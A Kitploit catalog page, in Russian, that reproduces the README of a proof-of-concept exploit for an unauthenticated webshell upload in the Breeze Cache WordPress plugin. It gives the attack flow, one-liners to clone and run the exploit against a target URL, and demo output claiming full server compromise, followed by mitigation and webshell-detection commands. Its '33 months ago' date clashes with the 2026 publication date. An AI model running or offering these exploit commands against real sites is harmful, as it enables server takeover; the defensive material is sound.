Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-3844 — Эксплойт PoC для CVE-2026-3844 — критическая уязвимость неаутентифицированной загрузки файлов в плагине Breeze для WordPress, приводящая к RCE. | Kitploit
Инструменты/GitHubGitHub/tausifzaman/cve-2026-3844
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеRed Teaming
GitHubtausifzaman/cve-2026-3844

CVE-2026-3844

Эксплойт PoC для CVE-2026-3844 — критическая уязвимость неаутентифицированной загрузки файлов в плагине Breeze для WordPress, приводящая к RCE.

Репозиторий
33 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-3844

PoC-эксплойт для CVE-2026-3844 — критической уязвимости неаутентифицированной загрузки файлов в плагине Breeze для WordPress, приводящей к RCE.

CVE-2026-3844 Typing SVG

CVE ID CVSS Score CWE Python WordPress Platform PoC Author



📌 Обзор

CVE-2026-3844 — КРИТИЧЕСКАЯ уязвимость неаутентифицированной произвольной загрузки файлов в плагине Breeze Cache для WordPress (от Cloudways), затрагивающая все версии до 2.4.4 включительно.

Этот репозиторий содержит эксплойт Proof of Concept (PoC) (CVE-2026-3844.py) для авторизованного исследования безопасности, пентеста и ответственного раскрытия.


Однострочная команда

root@kitploit:~
git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && python3

📊 Сводка уязвимости


🔍 Сведения об уязвимости

Корневая причина

Плагин Breeze Cache для WordPress загружает удалённые изображения Gravatar и сохраняет их локально, когда включена функция «Host Files Locally – Gravatars». Уязвимая функция fetch_gravatar_from_remote в class-breeze-cache-cronjobs.php (строки 89–119) не выполняет проверку типа файла или расширения для загружаемого удалённого содержимого.

root@kitploit:~
class-breeze-cache-cronjobs.php
  └── fetch_gravatar_from_remote()   ← ❌ No file type validation
        └── Saves remote content directly to disk
              └── Attacker controls → uploads .php webshell → RCE

Схема атаки

root@kitploit:~
Attacker (Unauthenticated)
    │
    ▼
Craft malicious HTTP request with PHP webshell URL as Gravatar
    │
    ▼
Plugin fetches & saves the .php file without validation
    │
    ▼
Webshell stored on server (e.g., /wp-content/breeze-cache/evil.php)
    │
    ▼
Attacker accesses webshell → Full RCE achieved

Воздействие

При успешной эксплуатации атакующий может:

  • 🔴 Выполнять произвольные команды операционной системы (RCE)
  • 🔴 Загружать постоянные бэкдоры / веб-шеллы
  • 🔴 Создавать поддельные учётные записи администратора WordPress
  • 🔴 Похищать базы данных, учётные данные и конфиденциальные файлы
  • 🔴 Портить сайт или удалять весь контент
  • 🔴 Использовать сервер для перемещения к другим системам в той же сети
  • 🔴 Включить сервер в ботнет

⚙️ Требования

  • Python 3.6+
  • библиотека requests
  • Целевой сайт под управлением Breeze Cache ≤ 2.4.4 с включённой опцией «Host Files Locally – Gravatars»

🚀 Установка и настройка

🐧 Linux / Termux (Android)

root@kitploit:~
# Clone the repository
git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && python3 CVE-2026-3844.py

# Navigate into the directory
cd CVE-2026-3844

# Install dependencies
pip install -r requirements.txt

# Run the exploit
python3 CVE-2026-3844.py

🪟 Windows (CMD / PowerShell)

root@kitploit:~
git clone https://github.com/tausifzaman/CVE-2026-3844.git
cd CVE-2026-3844
pip install -r requirements.txt
python CVE-2026-3844.py

🍎 macOS

root@kitploit:~
git clone https://github.com/tausifzaman/CVE-2026-3844.git
cd CVE-2026-3844
pip3 install -r requirements.txt
python3 CVE-2026-3844.py

🤖 Termux (одной строкой)

root@kitploit:~
pkg install python git -y && git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && pip install -r requirements.txt && python3 CVE-2026-3844.py

☁️ Google Cloud Shell (установка не требуется)

Open in Cloud Shell

root@kitploit:~
git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && pip install -r requirements.txt && python3 CVE-2026-3844.py

💻 Использование

root@kitploit:~
python3 CVE-2026-3844.py

Параметры

root@kitploit:~
usage: CVE-2026-3844.py [-h] -u URL [-t TIMEOUT] [-o OUTPUT] [-v]

CVE-2026-3844 — Breeze Cache WordPress Plugin Arbitrary File Upload PoC

optional arguments:
  -h, --help              Show this help message and exit
  -u URL, --url URL       Target URL (e.g. https://target.com)
  -t TIMEOUT              Request timeout in seconds (default: 10)
  -o OUTPUT               Save webshell path to output file
  -v, --verbose           Enable verbose/debug output

Примеры

root@kitploit:~
# Basic usage
python3 CVE-2026-3844.py -u https://vulnerable-site.com

# Verbose mode
python3 CVE-2026-3844.py -u https://vulnerable-site.com -v

# Custom timeout
python3 CVE-2026-3844.py -u https://vulnerable-site.com -t 20 -v

🖥️ Демонстрационный вывод PoC

root@kitploit:~
╔══════════════════════════════════════════════════════╗
║          CVE-2026-3844 | Breeze Cache WP RCE        ║
║          Researcher: tausifzaman.online              ║
╚══════════════════════════════════════════════════════╝

[*] Target     : https://vulnerable-site.com
[*] CVE        : CVE-2026-3844
[*] Plugin     : Breeze Cache ≤ 2.4.4
[*] Type       : Unauthenticated Arbitrary File Upload → RCE
[*] Checking target...

[+] Breeze Cache plugin detected!
[+] "Host Files Locally – Gravatars" is ENABLED
[*] Uploading PHP webshell via fetch_gravatar_from_remote...
[+] File uploaded successfully!
[+] Webshell path: /wp-content/breeze-cache/avatar_a1b2c3.php
[*] Verifying RCE...
[+] RCE CONFIRMED!

[+] Command output (id):
    uid=33(www-data) gid=33(www-data) groups=33(www-data)

[+] Full server compromise achieved.
[*] Cleanup: Remove /wp-content/breeze-cache/avatar_a1b2c3.php after testing.

🔒 Смягчение и устранение уязвимости

✅ Немедленные действия

Обновите Breeze Cache до версии 2.4.5 или новее — это единственное полное исправление.

root@kitploit:~
# WordPress CLI — update Breeze plugin immediately
wp plugin update breeze

🛡️ Временные меры (если вы не можете обновиться немедленно)

  1. Отключите опцию «Host Files Locally – Gravatars» в настройках Breeze Cache
  2. Заблокируйте уязвимую конечную точку с помощью правила WAF или .htaccess
  3. Запретите выполнение PHP в каталогах загрузок и кэша:
root@kitploit:~
# Add to /wp-content/uploads/.htaccess and /wp-content/cache/.htaccess
<FilesMatch "\.php$">
    deny from all
</FilesMatch>
  1. Проверьте наличие новых/изменённых подозрительных файлов:
root@kitploit:~
# Find recently modified PHP files in wp-content (possible webshells)
find /var/www/html/wp-content -name "*.php" -newer /var/www/html/wp-config.php -ls

# Search for common webshell indicators
grep -r "eval(base64_decode" /var/www/html/wp-content/
grep -r "system\|exec\|passthru\|shell_exec" /var/www/html/wp-content/cache/
  1. Заблокируйте подозрительные POST-запросы, нацеленные на функциональность получения Gravatar, через ваш WAF
  2. Отслеживайте журналы доступа на предмет запросов к /wp-content/breeze-cache/*.php
root@kitploit:~
# Monitor Apache/Nginx access logs for webshell hits
grep "breeze-cache.*\.php" /var/log/apache2/access.log
grep "breeze-cache.*\.php" /var/log/nginx/access.log

🔍 Проверка на факт компрометации

root@kitploit:~
# Check for unexpected PHP files in Breeze cache directory
find /var/www/html/wp-content/breeze-cache/ -name "*.php"

# Check for recently created files (last 7 days)
find /var/www/html/wp-content/ -name "*.php" -mtime -7

# Look for admin accounts created recently (run in wp-mysql)
SELECT user_login, user_registered FROM wp_users ORDER BY user_registered DESC LIMIT 10;

📚 Ссылки


👤 Автор

Tausif Zaman

🌐 tausifzaman.online  ·  🐙 GitHub @tausifzaman

Исследователь безопасности · Охотник за багами · Разработчик инструментов

Android · Python · PHP · Веб-безопасность · Тестирование на проникновение


⚠️ Правовой отказ

Этот репозиторий и содержащийся в нём код эксплойта предоставлены строго в образовательных целях и только для авторизованных исследований безопасности.

  • ✅ Вы можете использовать этот инструмент на системах, которыми владеете или на тестирование которых имеете явное письменное разрешение
  • ❌ Несанкционированное использование против сторонних систем противозаконно в соответствии с Computer Fraud and Abuse Act (CFAA), Computer Misuse Act и аналогичными законами по всему миру
  • Автор не несёт никакой ответственности за неправомерное использование, ущерб или противоправные действия, возникшие в результате использования этого инструмента

Хакайте этично. Раскрывайте ответственно. Оставайтесь в рамках закона. 🛡️


⭐ Если это помогло вашему исследованию, поставьте репозиторию звезду! ⭐

Star   Follow   Website

Скачать инструмент
ПолеСведения
CVE IDCVE-2026-3844
ПлагинBreeze Cache (от Cloudways)
Затронутые версииВсе версии ≤ 2.4.4
Исправленная версияBreeze 2.4.5+
Тип уязвимостиCWE-434 — Неограниченная загрузка файлов опасного типа
Оценка CVSS v3.19.8 (КРИТИЧЕСКАЯ)
Оценка CVSS v2.010.0 (КРИТИЧЕСКАЯ)
Вектор CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Вектор атакиСеть (удалённо)
Требуется аутентификация❌ Нет — без аутентификации
УсловиеДолжна быть включена опция «Host Files Locally – Gravatars» (отключена по умолчанию)
ВоздействиеКонфиденциальность: ВЫСОКАЯ · Целостность: ВЫСОКАЯ · Доступность: ВЫСОКАЯ
Опубликовано2026-04-23
ИсточникWordfence / NVD / MITRE
PoCTausif Zaman
ИсточникСсылка
🔗 NVD (NIST)nvd.nist.gov/vuln/detail/CVE-2026-3844
🔗 MITRE CVEcve.mitre.org – CVE-2026-3844
🔗 Wordfence Advisorywordfence.com – Threat Intel
🔗 WordPress Plugin Changelogplugins.trac.wordpress.org/changeset/3511463/breeze
🔗 Vulnerable Code (L89)class-breeze-cache-cronjobs.php#L89
🔗 Vulnerable Code (L119)class-breeze-cache-cronjobs.php#L119
🔗 GitHub AdvisoryGHSA-c529-q7mw-hq6j
🔗 PoC Repositorygithub.com/tausifzaman/CVE-2026-3844